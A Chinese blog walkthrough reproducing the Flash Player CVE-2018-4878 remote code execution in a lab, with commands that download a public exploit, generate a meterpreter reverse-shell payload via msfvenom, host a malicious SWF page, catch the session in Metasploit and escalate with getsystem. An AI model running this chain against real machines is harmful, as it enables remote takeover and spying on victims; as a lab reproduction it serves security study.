Flash 0day漏洞(CVE-2018-4878复现)

漏洞名: CVE-2018-4878

危害: 造成远程命令执行
影响范围: Flash Player28.0.0.137及以前的所有版本

准备工作:
kail: 192.168.91.146
win7,Flash Player28.0.0.137,IE8
这是一位前辈的Player:
链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0
事先下好exp:

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

解压:

rar x CVE-2018-4878.rar

如果出现找不到命令的情况,执行:

wget https://www.rarlab.com/rar/rarlinux-x64-5.5.0.tar.gz tar -zxvf rarlinux-x64-5.5.0.tar.gz cd rar make install mkdir -p /usr/local/bin mkdir -p /usr/local/lib cp rar unrar /usr/local/bin cp rarfiles.lst /etc cp default.sfx /usr/local/lib

使用msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=主机ip LPORT=6666 -f python > /root/shellcode.txt

生成一个python类型的shellcode
在这里插入图片描述
打开 /root/shellcode.txt
在这里插入图片描述

将生成的shellcode.txt里面的内容复制,并覆盖cve-2018-4878.py里面的shellcode
在这里插入图片描述

并将里面的stageless = True改为False,打开文件的地址改为自己的储存地址:

在这里插入图片描述
在这里插入图片描述

然后运行python文件,运行完之后生成两个文件:
在这里插入图片描述
在这里插入图片描述
将exploit.swf和index.html复制到/var/www/html下,启动apache服务:

 service apache2 start

开始复现:
打开msfconsole:
输入以下命令:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.91.146

set lport 6666

exploit

在这里插入图片描述
在这里插入图片描述

现在打开win7,访问我们的网页,192.168.91.146/index.html
在这里插入图片描述

kail:暂无反应,估计是因为win7虚拟机ie未响应,唉,毕竟是这么老的版本了
之后配置了一下,kail的ip改为:192.168.91.150
在这里插入图片描述
成功穿透,得到session;

使用shell命令获取目标主机的cmd:
在这里插入图片描述
getsystem:可以获取管理员权限
之后就可以随意输入命令啦
在这里插入图片描述
打开计算器并截图:

execute -f calc.exe
screenshot

在这里插入图片描述
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值